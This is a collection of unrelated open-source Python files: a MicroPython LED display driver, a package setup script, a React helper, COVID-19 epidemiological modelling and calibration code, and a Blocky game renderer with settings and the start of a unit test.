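# keeps 'image' as '42.jpg' (set before the id is prefixed), rewrites 'id' to
# 'pale-ale-42', and drops 'ibu' because it is 'N/A'.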
if __name__=="__main__":
parser = argparse.ArgumentParser(description='Convert catalog data from CSV file.')
parser.add_argument('file', metavar='CATALOG_CSV_FILE', type=open, help='CSV file with catalog data')
args = parser.parse_args()
products_yaml = open('src/products-service/data/products.yaml', 'w')
categories_yaml = open('src/products-service/data/categories.yaml', 'w')
reader = csv.DictReader(args.file)
products = list(reader)
categories = []
category_names = set()
for product in products:
product = format_product(product)
if product['category'] not in category_names:
category_names.add(product['category'])
categories.append(create_category(len(category_names), product))
yaml.dump(products, products_yaml, allow_unicode=True, sort_keys=False, default_flow_style=False)
yaml.dump(categories, categories_yaml, allow_unicode=True, sort_keys=False, default_flow_style=False)
```
|
{
"source": "JennaSys/micropython-max7219",
"score": 3
}
|
#### File: JennaSys/micropython-max7219/max7219.py
```python
from machine import Pin, SPI
import time
from seven_segment_ascii import get_char2
MAX7219_DIGITS = 8
MAX7219_REG_NOOP = 0x0
MAX7219_REG_DIGIT0 = 0x1
MAX7219_REG_DIGIT1 = 0x2
MAX7219_REG_DIGIT2 = 0x3
MAX7219_REG_DIGIT3 = 0x4
MAX7219_REG_DIGIT4 = 0x5
MAX7219_REG_DIGIT5 = 0x6
MAX7219_REG_DIGIT6 = 0x7
MAX7219_REG_DIGIT7 = 0x8
MAX7219_REG_DECODEMODE = 0x9
MAX7219_REG_INTENSITY = 0xA
MAX7219_REG_SCANLIMIT = 0xB
MAX7219_REG_SHUTDOWN = 0xC
MAX7219_REG_DISPLAYTEST = 0xF
SPI_BUS = 1 # hardware SPI
SPI_BAUDRATE = 100000
SPI_CS = 0 # D3
class SevenSegment:
def __init__(self, digits=8, scan_digits=MAX7219_DIGITS, baudrate=SPI_BAUDRATE, cs=SPI_CS):
"""
Constructor:
`digits` should be the total number of individual digits being displayed
`cs` is the GPIO port to use for the chip select line of the SPI bus - defaults to GPIO 0 / D3
`scan_digits` is the number of digits each individual max7219 displays
`baudrate` defaults to 100KHz, note that excessive rates may result in instability (and is probably unnecessary)
"""
self.digits = digits
self.devices = -(-digits // scan_digits) # ceiling integer division
self.scan_digits = scan_digits
self._buffer = [0] * digits
self._spi = SPI(SPI_BUS, baudrate=baudrate, polarity=0, phase=0)
self._cs = Pin(cs, Pin.OUT, value=1)
self.command(MAX7219_REG_SCANLIMIT, scan_digits-1) # digits to display on each device 0-7
self.command(MAX7219_REG_DECODEMODE, 0) # use segments (not digits)
self.command(MAX7219_REG_DISPLAYTEST, 0) # no display test
self.command(MAX7219_REG_SHUTDOWN, 1) # not blanking mode
self.brightness(7) # intensity: range: 0..15
self.clear()
def command(self, register, data):
"""Sets a specific register some data, replicated for all cascaded devices."""
self._write([register, data] * self.devices)
def _write(self, data):
"""Send the bytes (which should comprise of alternating command, data values) over the SPI device."""
self._cs.off()
self._spi.write(bytes(data))
self._cs.on()
def clear(self, flush=True):
"""Clears the buffer and if specified, flushes the display."""
self._buffer = [0] * self.digits
if flush:
self.flush()
def flush(self):
"""For each digit, cascade out the contents of the buffer cells to the SPI device."""
for dev in range(self.devices):
for pos in range(self.scan_digits):
self._write([pos + MAX7219_REG_DIGIT0, self._buffer[pos + (dev * self.scan_digits)]] + ([MAX7219_REG_NOOP, 0] * dev))
def brightness(self, intensity):
"""Sets the brightness level of all cascaded devices to the same intensity level, ranging from 0..15."""
self.command(MAX7219_REG_INTENSITY, intensity)
def letter(self, position, char, dot=False, flush=True):
"""Looks up the appropriate character representation for char and updates the buffer, flushes by default."""
value = get_char2(char) | (dot << 7)
self._buffer[position] = value
if flush:
self.flush()
def text(self, text):
"""Outputs the text (as near as possible) on the specific device."""
self.clear(False)
text = text[:self.digits] # make sure we don't overrun the buffer
for pos, char in enumerate(text):
self.letter(pos, char, flush=False)
self.flush()
def number(self, val):
"""Formats the value according to the parameters supplied, and displays it."""
self.clear(False)
strval = ''
if isinstance(val, (int, float)):
strval = str(val)
elif isinstance(val, str):
if val.replace('.', '', 1).strip().isdigit():
strval = val
if '.' in strval:
strval = strval[:self.digits+1]
else:
strval = strval[:self.digits]
pos = 0
for char in strval:
dot = False
if char == '.':
continue
else:
if pos < len(strval) - 1:
if strval[pos + 1] == '.':
dot = True
self.letter(pos, char, dot, False)
pos += 1
self.flush()
def scroll(self, rotate=True, reverse=False, flush=True):
"""Shifts buffer contents left or right (reverse), with option to wrap around (rotate)."""
if reverse:
tmp = self._buffer.pop()
if rotate:
self._buffer.insert(0, tmp)
else:
self._buffer.insert(0, 0x00)
else:
tmp = self._buffer.pop(0)
if rotate:
self._buffer.append(tmp)
else:
self._buffer.append(0x00)
if flush:
self.flush()
def message(self, text, delay=0.4):
"""Transitions the text message across the devices from left-to-right."""
self.clear(False)
for char in text:
time.sleep(delay)
self.scroll(rotate=False, flush=False)
self.letter(self.digits-1, char)
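# Hedged usage sketch (an assumption; wiring and the chip-select pin depend on the
# board, SPI_CS above defaults to GPIO 0 / D3):
#
#     display = SevenSegment(digits=8)
#     display.brightness(5)
#     display.number(1234.5)
#     display.text("HELLO")
#     display.message("HI THERE")  # scrolls across the display with a 0.4 s delay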
```
|
{
"source": "JennaSys/pcra",
"score": 2
}
|
#### File: JennaSys/pcra/setup.py
```python
from setuptools import setup, find_packages
import pathlib
import sys
# The directory containing this file
project_folder = pathlib.Path(__file__).parent
sys.path.append(str(project_folder))
from pcra import __version__
def glob_fix(package_name, glob):
# this assumes setup.py lives in the folder that contains the package
package_path = pathlib.Path(f'./{package_name}').resolve()
return [str(path.relative_to(package_path))
for path in package_path.glob(glob)]
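# Illustrative example (paths are hypothetical): glob_fix('pcra', 'template/**/*')
# returns entries such as 'template/project/src/app.py', i.e. paths relative to the
# pcra package folder, which is the form package_data expects.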
# The text of the README file
README = (project_folder / "README.md").read_text()
setup(
name="pcra",
version=__version__,
description="Python Create React App",
long_description=README,
long_description_content_type="text/markdown",
url="https://github.com/JennaSys/pcra",
author="<NAME>",
author_email="<EMAIL>",
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Framework :: Flask",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Programming Language :: Python :: 3.7",
"Operating System :: OS Independent",
"Environment :: Console",
"Natural Language :: English"
],
python_requires=">=3.7,<3.8",
keywords="react material-ui mui transcrypt cli web",
packages=find_packages(include=["pcra"]),
package_data={'pcra': [*glob_fix('pcra', 'template/**/*')]},
install_requires=["patch", "colorama"],
entry_points={
"console_scripts": [
"py-create-react-app=pcra.__main__:main",
]
},
)
```
|
{
"source": "JennaSys/rtp_demo",
"score": 3
}
|
#### File: JennaSys/rtp_demo/pyreact.py
```python
# __pragma__ ('skip')
def require(lib):
return lib
class document:
getElementById = None
addEventListener = None
# __pragma__ ('noskip')
# Load React and ReactDOM JavaScript libraries into local namespace
React = require('react')
ReactDOM = require('react-dom')
# Map React javaScript objects to Python identifiers
createElement = React.createElement
useState = React.useState
def render(root_component, props, container):
"""Loads main react component into DOM"""
def main():
ReactDOM.render(
React.createElement(root_component, props),
document.getElementById(container)
)
document.addEventListener('DOMContentLoaded', main)
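# Hedged usage sketch (an assumption, not part of the original file): a minimal
# functional component rendered into a container element whose id is assumed to be 'root'.
#
#     def App(props):
#         count, setCount = useState(0)
#         return createElement('button',
#                              {'onClick': lambda: setCount(count + 1)},
#                              'Clicks: ', count)
#     render(App, None, 'root')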
```
|
{
"source": "JennaVergeynst/COVID19-Model",
"score": 4
}
|
#### File: covid19model/data/sciensano.py
```python
import os
import datetime
import pandas as pd
import numpy as np
def get_sciensano_COVID19_data(update=True):
"""Download Sciensano hospitalisation cases data
    This function returns the publicly available Sciensano data
    on COVID-19 related hospitalisations. A copy of the downloaded dataset
is automatically saved in the /data/raw folder.
Parameters
----------
update : boolean (default True)
True if you want to update the data,
False if you want to read only previously saved data
Returns
-----------
df : pandas.DataFrame
DataFrame with the sciensano data on daily basis. The following columns
are returned:
- pd.DatetimeIndex : datetimes for which a data point is available
- H_tot : total number of hospitalised patients (according to Sciensano)
- ICU_tot : total number of hospitalised patients in ICU
- H_in : total number of patients going to hospital on given date
        - H_out : total number of patients discharged from hospital on given date
- H_tot_cumsum : calculated total number of patients in hospital,
          calculated by taking the cumulative sum of H_net = H_in - H_out
- D_tot : total number of deaths
- D_xx_yy: total number of deaths in the age group xx to yy years old
Notes
----------
The data is extracted from Sciensano database: https://epistat.wiv-isp.be/covid/
Variables in raw dataset are documented here: https://epistat.sciensano.be/COVID19BE_codebook.pdf
Example use
-----------
>>> # download data from sciensano website and store new version
>>> sciensano_data = get_sciensano_COVID19_data(update=True)
>>> # load data from raw data directory (no new download)
>>> sciensano_data = get_sciensano_COVID19_data()
"""
# Data source
url = 'https://epistat.sciensano.be/Data/COVID19BE.xlsx'
abs_dir = os.path.dirname(__file__)
if update==True:
# Extract hospitalisation data from source
df = pd.read_excel(url, sheet_name="HOSP")
# save a copy in the raw folder
rel_dir = os.path.join(abs_dir, '../../../data/raw/sciensano/COVID19BE_HOSP.csv')
df.to_csv(rel_dir, index=False)
# Extract total reported deaths per day
df_mort = pd.read_excel(url, sheet_name='MORT', parse_dates=['DATE'])
# save a copy in the raw folder
rel_dir_M = os.path.join(abs_dir, '../../../data/raw/sciensano/COVID19BE_MORT.csv')
df_mort.to_csv(rel_dir_M, index=False)
else:
df = pd.read_csv(os.path.join(abs_dir,
'../../../data/raw/sciensano/COVID19BE_HOSP.csv'), parse_dates=['DATE'])
df_mort = pd.read_csv(os.path.join(abs_dir,
'../../../data/raw/sciensano/COVID19BE_MORT.csv'), parse_dates=['DATE'])
# Resample data from all regions and sum all values for each date
df = df.resample('D', on='DATE').sum()
variable_mapping = {"TOTAL_IN": "H_tot",
"TOTAL_IN_ICU": "ICU_tot",
"NEW_IN": "H_in",
"NEW_OUT": "H_out"}
df = df.rename(columns=variable_mapping)
df = df[list(variable_mapping.values())]
df["H_tot_cumsum"] = (df["H_in"] - df["H_out"]).cumsum().values
df["D_tot"] = df_mort.resample('D', on='DATE')['DEATHS'].sum()
# Extract total reported deaths per day and per age group
df["D_25_44"] = df_mort.loc[(df_mort['AGEGROUP'] == '25-44')].resample('D', on='DATE')['DEATHS'].sum()
df["D_45_64"] = df_mort.loc[(df_mort['AGEGROUP'] == '45-64')].resample('D', on='DATE')['DEATHS'].sum()
df["D_65_74"] = df_mort.loc[(df_mort['AGEGROUP'] == '65-74')].resample('D', on='DATE')['DEATHS'].sum()
df["D_75_84"] = df_mort.loc[(df_mort['AGEGROUP'] == '75-84')].resample('D', on='DATE')['DEATHS'].sum()
df["D_85+"] = df_mort.loc[(df_mort['AGEGROUP'] == '85+')].resample('D', on='DATE')['DEATHS'].sum()
return df.fillna(0)
```
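A minimal usage sketch for the loader above, assuming the `covid19model` package and its `data/raw/sciensano` folder are available locally (the column names come from the docstring; the plotting choices are illustrative only):
```python
import matplotlib.pyplot as plt
from covid19model.data import sciensano

# Read the previously saved copy instead of re-downloading
df = sciensano.get_sciensano_COVID19_data(update=False)

# Smooth the daily hospital admissions with a 7-day rolling mean and compare with ICU load
df['H_in'].rolling(window=7, center=True).mean().plot(label='H_in (7-day mean)')
df['ICU_tot'].plot(label='ICU_tot')
plt.ylabel('number of patients')
plt.legend()
plt.show()
```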
#### File: covid19model/models/utils.py
```python
import numpy as np
import pandas as pd
import os
abs_dir = os.path.dirname(__file__)
data_path = os.path.join(abs_dir, "../../../data/")
def sample_beta_binomial(n, p, k, size=None):
p = np.random.beta(k/(1-p), k/p, size=size)
r = np.random.binomial(n, p)
return r
def name2nis(name):
"""
A function to convert the name of a Belgian municipality/arrondissement/province/etc. to its NIS code
Parameters
----------
name : str
the name of the municipality/arrondissement/province/etc.
Returns
-------
NIS : float
the NIS code corresponding with the given name
"""
# Load the list of name-NIS couples
name_df=pd.read_csv(os.path.join(data_path, 'raw/GIS/NIS_name.csv'))
pos_name = name_df['name'].values
# Convert list of possible names to lowercase only
pos_name_lower = [string.lower() for string in pos_name]
name_df['name'] = pos_name_lower
# Check if input is a string
if not isinstance(name,str):
raise TypeError(
"name2nis input must be a string"
)
# Convert input to lowercase
name = name.lower()
# Search for a match and return NIS code
    if name not in pos_name_lower:
raise ValueError(
"No match for '{0}' found".format(name)
)
else:
return name_df[name_df['name'] == name]['NIS'].values[0]
def read_coordinates_nis():
"""
A function to extract from /data/interim/census_2011/initN.csv the list of arrondissement NIS codes
Returns
-------
NIS: list
a list containing the NIS codes of the 43 Belgian arrondissements
"""
initN_df=pd.read_csv(os.path.join(data_path, 'interim/census_2011/initN.csv'), index_col=[0])
NIS = initN_df.index.values
return NIS
```
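To make the reparameterisation in `sample_beta_binomial` concrete, here is a standalone sketch (NumPy only, not taken from the repository) showing that the success probability is jittered with a Beta distribution whose mean is `p`, so that `k` acts as an overdispersion knob: small `k` inflates the variance, large `k` recovers an ordinary binomial.
```python
import numpy as np

n_trials, p, size = 100, 0.3, 100_000
for k in (1, 10, 1000):
    p_draw = np.random.beta(k / (1 - p), k / p, size=size)  # Beta with mean p
    r = np.random.binomial(n_trials, p_draw)                # beta-binomial draw
    print(f"k={k:>4}: mean={r.mean():.2f}  var={r.var():.1f}")
# Reference: a plain binomial has mean n*p = 30.00 and variance n*p*(1-p) = 21.0
```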
#### File: covid19model/optimization/run_optimization.py
```python
import random
import os
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import datetime
import scipy
from scipy.integrate import odeint
import matplotlib.dates as mdates
import matplotlib
import scipy.stats as st
import math
import xarray as xr
import emcee
import json
import corner
from covid19model.optimization import objective_fcns
from covid19model.optimization import MCMC
from covid19model.models import models
from covid19model.data import google
from covid19model.data import sciensano
from covid19model.data import polymod
from covid19model.data import model_parameters
from covid19model.visualization.optimization import traceplot
initN, Nc_home, Nc_work, Nc_schools, Nc_transport, Nc_leisure, Nc_others, Nc_total = polymod.get_interaction_matrices()
def full_calibration(model, timeseries, spatial_unit, start_date, end_beta, end_ramp,
fig_path, samples_path,
maxiter=50, popsize=50, steps_mcmc=10000):
"""
model : object
initialized model
timeseries : Series
data to fit with date in index
spatial_unit : string
name of the spatial_unit, e.g. Gent, Antwerp, Belgium
start_date, end_beta, end_ramp : string, format YYYY-MM-DD
date of first data point, last date for fitting beta and last date
for fitting the compliance ramp
fig_path : string
path to folder where to save figures
samples_path : string
path to folder where to save samples
maxiter: int (default 50)
maximum number of pso iterations
popsize: int (default 50)
population size of particle swarm
increasing this variable lowers the chance of finding local minima but
slows down calculations
steps_mcmc : int (default 10000)
number of steps in MCMC calibration
"""
plt.ioff()
# define dataset
data=[timeseries[start_date:end_beta]]
states = [["H_in"]]
#############################################
####### CALIBRATING BETA AND LAG_TIME #######
#############################################
# set optimisation settings
parNames_pso = ['sigma_data','extraTime','beta'] # must be a list!
bounds_pso=((1,100),(30,60),(0.02,0.06)) # must be a list!
# run pso optimisation
theta = MCMC.fit_pso(model,data,parNames_pso,states,bounds_pso,maxiter=maxiter,popsize=popsize)
lag_time = int(round(theta[1]))
    # Assign 'extraTime' or lag_time as a model attribute --> is needed to perform the optimization
model.extraTime = int(round(theta[1]))
model.parameters.update({'beta': theta[2]})
parNames_mcmc = ['sigma_data','beta'] # must be a list!
bounds_mcmc=((1,200),(0.01,0.10))
# run MCMC calibration
pos = [theta[0],theta[2]] + [1, 1e-2 ]* np.random.randn(4, 2)
nwalkers, ndim = pos.shape
sampler = emcee.EnsembleSampler(nwalkers, ndim, objective_fcns.log_probability,
args=(model, bounds_mcmc, data, states, parNames_mcmc))
sampler.run_mcmc(pos, steps_mcmc, progress=True);
samples_beta = sampler.get_chain(discard=100,flat=False)
flat_samples_beta = sampler.get_chain(discard=100,flat=True)
try:
sampler.get_autocorr_time()
except:
print('Calibrating beta. Warning: The chain is shorter than 50 times the integrated autocorrelation time for 4 parameter(s). Use this estimate with caution and run a longer chain!')
traceplot(samples_beta,labels=['$\sigma_{data}$','$\\beta$'],plt_kwargs={'linewidth':2,'color': 'red','alpha': 0.15})
plt.savefig(fig_path+'traceplots/beta_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
fig = corner.corner(flat_samples_beta,labels=['$\sigma_{data}$','$\\beta$'])
fig.set_size_inches(8, 8)
plt.savefig(fig_path+'cornerplots/beta_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
#############################################
####### CALIBRATING COMPLIANCE PARAMS #######
#############################################
samples_beta = {'beta': flat_samples_beta[:,1].tolist()}
# Create checkpoints dictionary
chk_beta_pso = {
'time': [lag_time],
'Nc': [0.2*Nc_home + 0.3*Nc_work + 0.2*Nc_transport],
}
# define dataset
data=[timeseries[start_date:end_ramp]]
# set optimisation settings
parNames_pso2 = ['sigma_data','l','tau','prevention'] # must be a list!
bounds_pso2=((1,100),(0.1,20),(0,20),(0,1)) # must be a list!
# run optimisation
theta = MCMC.fit_pso(model, data, parNames_pso2, states, bounds_pso2,
checkpoints=chk_beta_pso, samples=samples_beta, maxiter=maxiter,popsize=popsize)
model.parameters.update({'l': theta[1], 'tau': theta[2]})
    prevention = theta[3]  # theta[3] corresponds to 'prevention' in parNames_pso2
# Create checkpoints dictionary
chk_beta_MCMC = {
'time': [lag_time],
'Nc': [prevention*(1.0*Nc_home + 0.4*Nc_work + 0.3*Nc_transport + 0.7*Nc_others + 0.2*Nc_leisure)]}
bounds_mcmc2=((1,100),(0.001,20),(0,20),(0,1)) # must be a list!
pos = theta + [1, 0.1, 0.1, 0.1 ]* np.random.randn(8, 4)
nwalkers, ndim = pos.shape
sampler = emcee.EnsembleSampler(nwalkers, ndim, objective_fcns.log_probability,
args=(model,bounds_mcmc2,data,states,parNames_pso2,chk_beta_MCMC,samples_beta))
sampler.run_mcmc(pos, steps_mcmc, progress=True);
try:
sampler.get_autocorr_time()
except:
print('Calibrating compliance ramp. Warning: The chain is shorter than 50 times the integrated autocorrelation time for 4 parameter(s). Use this estimate with caution and run a longer chain!')
samples_ramp = sampler.get_chain(discard=200,flat=False)
flat_samples_ramp = sampler.get_chain(discard=200,flat=True)
traceplot(samples_ramp, labels=["$\sigma_{data}$","l","$\\tau$","prevention"],
plt_kwargs={'linewidth':2,'color': 'red','alpha': 0.15})
plt.savefig(fig_path+'traceplots/ramp_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
fig = corner.corner(flat_samples_ramp, labels=["$\sigma_{data}$","l","$\\tau$","$\Omega$"])
fig.set_size_inches(9, 9)
plt.savefig(fig_path+'cornerplots/ramp_'+str(spatial_unit)+'_'+str(datetime.date.today())+'.pdf',
dpi=600, bbox_inches='tight')
#############################################
####### CALCULATING R0 ######################
#############################################
R0 =[]
for i in range(len(samples_beta['beta'])):
R0.append(sum((model.parameters['a']*model.parameters['da']+model.parameters['omega'])*samples_beta['beta'][i]*model.parameters['s']*np.sum(Nc_total,axis=1)*(initN/sum(initN))))
R0_stratified = np.zeros([initN.size,len(samples_beta['beta'])])
for i in range(len(samples_beta['beta'])):
R0_stratified[:,i]= (model.parameters['a']*model.parameters['da']+model.parameters['omega'])*samples_beta['beta'][i]*model.parameters['s']*np.sum(Nc_total,axis=1)
R0_stratified_dict = pd.DataFrame(R0_stratified).T.to_dict(orient='list')
samples_dict={'calibration_data':states[0][0], 'start_date':start_date,
'end_beta':end_beta, 'end_ramp':end_ramp,
'maxiter': maxiter, 'popsize':popsize, 'steps_mcmc':steps_mcmc,
'R0':R0, 'R0_stratified_dict':R0_stratified_dict,
'lag_time': lag_time, 'beta': samples_beta['beta'],
'l': flat_samples_ramp[:,1].tolist(),'tau':flat_samples_ramp[:,2].tolist(),
'prevention':flat_samples_ramp[:,3].tolist()}
with open(samples_path+str(spatial_unit)+'_'+str(datetime.date.today())+'.json', 'w') as fp:
json.dump(samples_dict, fp)
plt.ion()
return samples_dict
```
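The MCMC stage of `full_calibration` initialises the `emcee` ensemble by jittering a point estimate (here the PSO result) with Gaussian noise, one row per walker. The following self-contained toy example reproduces just that pattern with a made-up Gaussian log-probability in place of `objective_fcns.log_probability`:
```python
import numpy as np
import emcee

def log_probability(theta):
    # Toy target: independent standard normal components
    return -0.5 * np.sum(theta ** 2)

point_estimate = np.array([0.5, -1.0])                 # stand-in for the PSO result
pos = point_estimate + 1e-2 * np.random.randn(8, 2)    # 8 walkers jittered around it
nwalkers, ndim = pos.shape

sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability)
sampler.run_mcmc(pos, 2000, progress=True)
flat_samples = sampler.get_chain(discard=200, flat=True)
print(flat_samples.mean(axis=0), flat_samples.std(axis=0))
```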
|
{
"source": "Jenna-wang-0965/BlockyGame",
"score": 3
}
|
#### File: Jenna-wang-0965/BlockyGame/renderer.py
```python
from typing import Dict, List, Tuple, Optional
import pygame
from actions import ROTATE_CLOCKWISE, ROTATE_COUNTER_CLOCKWISE,\
SWAP_HORIZONTAL, SWAP_VERTICAL, SMASH, ACTION_KEY, ACTION_LABEL, COMBINE,\
PAINT, PASS
from settings import BACKGROUND_COLOUR, TEXT_COLOUR, OUTLINE_THICKNESS, \
OUTLINE_COLOUR, HIGHLIGHT_THICKNESS, HIGHLIGHT_COLOUR, COLOUR_LIST, \
colour_name
Y_FONT_PADDING = 2
def _load_image(path_to_file: str) -> pygame.Surface:
"""
Load an image from <path_to_file>.
If an error occurs, print it before exiting the program.
"""
try:
image = pygame.image.load(path_to_file)
except pygame.error as e:
# Avoid outputting the stack trace, just show the error
print('ERROR: ', e)
raise SystemExit
return image
def _print_to_image(text: str, x: int, y: int, font: pygame.font.Font,
image: pygame.Surface,
colour: Tuple[int, int, int] = TEXT_COLOUR) -> None:
"""Use <font> to print <text> to (<x>, <y>) on <image> with <colour>.
"""
text_surface = font.render(text, 1, colour)
image.blit(text_surface, (x, y))
def _print_human_instructions(x: int, y: int, text_height: int,
font: pygame.font.Font, image: pygame.Surface)\
-> int:
# Print a heading
_print_to_image('Human Controls', x, y, font, image)
# Indent the next items
x += 10
y += text_height + Y_FONT_PADDING
text = 'Increase Level: S'
_print_to_image(text, x, y, font, image)
y += text_height + Y_FONT_PADDING
text = 'Decrease Level: W'
_print_to_image(text, x, y, font, image)
y += text_height + Y_FONT_PADDING
for action, key in ACTION_KEY.items():
key_name = pygame.key.name(key).upper()
label = ACTION_LABEL[action]
text = f'{label}: {key_name}'
_print_to_image(text, x, y, font, image)
y += text_height + Y_FONT_PADDING
return y
def _print_ai_instructions(x: int, y: int, text_height: int,
font: pygame.font.Font, image: pygame.Surface)\
-> int:
_print_to_image('Non-Human Controls', x, y, font, image)
# Indent the next item
x += 10
y += text_height + Y_FONT_PADDING
_print_to_image('Click Mouse to Continue', x, y, font, image)
y += text_height + Y_FONT_PADDING
return y
def _print_colours(x: int, y: int, text_height: int,
font: pygame.font.Font, image: pygame.Surface)\
-> int:
_print_to_image('Colours', x, y, font, image)
# Indent the next item
x += 10
y += text_height + Y_FONT_PADDING
for c in COLOUR_LIST:
_print_to_image(colour_name(c), x, y, font, image, c)
y += text_height + Y_FONT_PADDING
return y
def _print_instructions(screen: pygame.Surface,
font: pygame.font.Font, height: int) -> \
pygame.Surface:
text_height = font.size("Test")[1]
image = screen.subsurface(((750, 0), (250, height)))
# Setup the initial position
x_pos = 10
y_pos = 5
y_pos = _print_human_instructions(x_pos, y_pos, text_height, font, image)
y_pos += text_height + Y_FONT_PADDING
y_pos = _print_ai_instructions(x_pos, y_pos, text_height, font, image)
y_pos += text_height + Y_FONT_PADDING
_print_colours(x_pos, y_pos, text_height, font, image)
return image
class Renderer:
"""
A class designed to handle drawing the different aspects of a Blocky game.
"""
# === Private Attributes ===
# _screen:
# The pygame image to draw on for visualizing graphics.
# _font:
# The font to use for text being drawn.
# _images:
# A dictionary mapping actions to images that are displayed in the game.
# _status_position:
# The (x, y) position of the status messages.
_screen: pygame.Surface
_instructions: pygame.Surface
_images: Dict[Tuple[str, Optional[int]], pygame.Surface]
_font: pygame.font.Font
_status_position: Tuple[int, int]
_clear_rect: Tuple[Tuple[int, int], Tuple[int, int]]
def __init__(self, size: int) -> None:
"""Initialize this Renderer for a board with dimensions <size> x <size>.
"""
self._font = pygame.font.Font(pygame.font.get_default_font(), 14)
status_height = self._font.size("Player")[1]
instructions_width = 250
height = size + status_height + 2 * Y_FONT_PADDING
width = size + instructions_width
self._screen = pygame.display.set_mode((width, height))
self._instructions = _print_instructions(self._screen, self._font,
height)
self._status_position = (10, size + Y_FONT_PADDING)
self._clear_rect = ((0, 0), (size, height))
self._images = {
ROTATE_CLOCKWISE: _load_image('images/rotate-cw.png'),
ROTATE_COUNTER_CLOCKWISE: _load_image('images/rotate-ccw.png'),
SWAP_HORIZONTAL: _load_image('images/swap-horizontal.png'),
SWAP_VERTICAL: _load_image('images/swap-vertical.png'),
SMASH: _load_image('images/smash.png'),
COMBINE: _load_image('images/combine.png'),
PAINT: _load_image('images/paint.png'),
PASS: _load_image('images/pass.png')
}
def clear(self) -> None:
"""Clear the screen with BACKGROUND_COLOUR.
"""
self._screen.fill(BACKGROUND_COLOUR, self._clear_rect)
def draw_image(self, action: Tuple[str, Optional[int]],
pos: Tuple[int, int], size: int) -> None:
"""Draw the image that coincides with action at pos, stretched to fit
size.
If the action is not supported, no image is drawn.
"""
if action in self._images:
image = self._images[action]
image = pygame.transform.scale(image, (size, size))
self._screen.blit(image, pos)
def draw_board(self, squares: List[Tuple[Tuple[int, int, int],
Tuple[int, int], int]]) -> None:
"""Draw each block in blocks onto the screen.
"""
for colour, pos, size in squares:
rect = (pos[0], pos[1], size, size)
pygame.draw.rect(self._screen, colour, rect, 0)
pygame.draw.rect(self._screen, OUTLINE_COLOUR, rect,
OUTLINE_THICKNESS)
def highlight_block(self, pos: Tuple[int, int], size: int) -> None:
"""Draw a highlighted square border at pos with size.
"""
rect = (pos[0], pos[1], size, size)
pygame.draw.rect(self._screen, HIGHLIGHT_COLOUR, rect,
HIGHLIGHT_THICKNESS)
def text_height(self) -> int:
"""Return the height between lines of text in pixels.
"""
return self._font.size("Test")[1] + Y_FONT_PADDING
def print(self, text: str, x: int, y: int) -> None:
"""Print <text> to the (<x>, <y>) location on the screen.
"""
_print_to_image(text, x, y, self._font, self._screen)
def draw_status(self, message: str) -> None:
"""Draw the current status of the game.
"""
surface = self._font.render(message, 1, TEXT_COLOUR)
self._screen.blit(surface, self._status_position)
def save_to_file(self, filename: str) -> None:
"""Save the current graphics on the screen to a file named #.
"""
pygame.image.save(self._screen, filename)
```
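A hypothetical driver for the class above (not part of the repository), assuming pygame is installed and the repo's `images/` folder with the action icons is present in the working directory, since `__init__` loads them:
```python
import pygame
from renderer import Renderer
from settings import COLOUR_LIST

pygame.init()
renderer = Renderer(750)          # 750x750 board plus the instruction panel
renderer.clear()
# draw_board expects (colour, position, size) triples, e.g. from _block_to_squares
renderer.draw_board([
    (COLOUR_LIST[0], (0, 0), 375),
    (COLOUR_LIST[1], (375, 0), 375),
    (COLOUR_LIST[2], (0, 375), 375),
    (COLOUR_LIST[3], (375, 375), 375),
])
renderer.highlight_block((0, 0), 375)
renderer.draw_status('Demo board')
pygame.display.flip()
pygame.time.wait(2000)
pygame.quit()
```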
#### File: Jenna-wang-0965/BlockyGame/settings.py
```python
from typing import Tuple
# Colours that we could use in the game
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
PACIFIC_POINT = (1, 128, 181)
OLD_OLIVE = (138, 151, 71)
REAL_RED = (199, 44, 58)
MELON_MAMBO = (234, 62, 112)
DAFFODIL_DELIGHT = (255, 211, 92)
TEMPTING_TURQUOISE = (75, 196, 213)
# A pallette of the colours we use in the game
COLOUR_LIST = [PACIFIC_POINT, REAL_RED, OLD_OLIVE, DAFFODIL_DELIGHT]
# The game board will be a square with this size.
BOARD_SIZE = 750
# The background will be this colour.
BACKGROUND_COLOUR = BLACK
# Text will have this colour.
TEXT_COLOUR = WHITE
# Blocks will have this colour outline.
OUTLINE_COLOUR = BLACK
# Blocks will have this thick of an outline.
OUTLINE_THICKNESS = 3
# Blocks will be highlighted with this colour.
HIGHLIGHT_COLOUR = TEMPTING_TURQUOISE
# Highlighted blocks will have this thickness to the highlight.
HIGHLIGHT_THICKNESS = 5
# The number of seconds a move is animated for.
ANIMATION_DURATION = 1
def colour_name(colour: Tuple[int, int, int]) -> str:
"""Return the colour name associated with this colour value, or the empty
string if this colour value isn't in our colour list.
>>> colour_name((1, 128, 181))
'Pacific Point'
>>> colour_name(PACIFIC_POINT)
'Pacific Point'
"""
colour_names = {
PACIFIC_POINT: 'Pacific Point',
REAL_RED: 'Real Red',
OLD_OLIVE: 'Old Olive',
DAFFODIL_DELIGHT: 'Daffodil Delight'
}
if colour in colour_names:
return colour_names[colour]
else:
return ''
```
#### File: Jenna-wang-0965/BlockyGame/unit_test.py
```python
from __future__ import annotations
from typing import *
import os
import pygame
import pytest
from block import Block
from blocky import _block_to_squares
from goal import BlobGoal, PerimeterGoal, _flatten, generate_goals
from player import _get_block, create_players, HumanPlayer, RandomPlayer, SmartPlayer
from renderer import Renderer
from settings import COLOUR_LIST
def set_children(block: Block, colours: List[Optional[Tuple[int, int, int]]]) \
-> None:
"""Set the children at <level> for <block> using the given <colours>.
Precondition:
- len(colours) == 4
- block.level + 1 <= block.max_depth
"""
size = block._child_size()
positions = block._children_positions()
level = block.level + 1
depth = block.max_depth
block.children = [] # Potentially discard children
for i in range(4):
b = Block(positions[i], size, colours[i], level, depth)
block.children.append(b)
# TODO: ~~~~~~ TASK 1 ~~~~~~ ~~~~~~ TASK 1 ~~~~~~ ~~~~~~ TASK 1 ~~~~~~
def test_rotate_1() -> None:
# Level 0
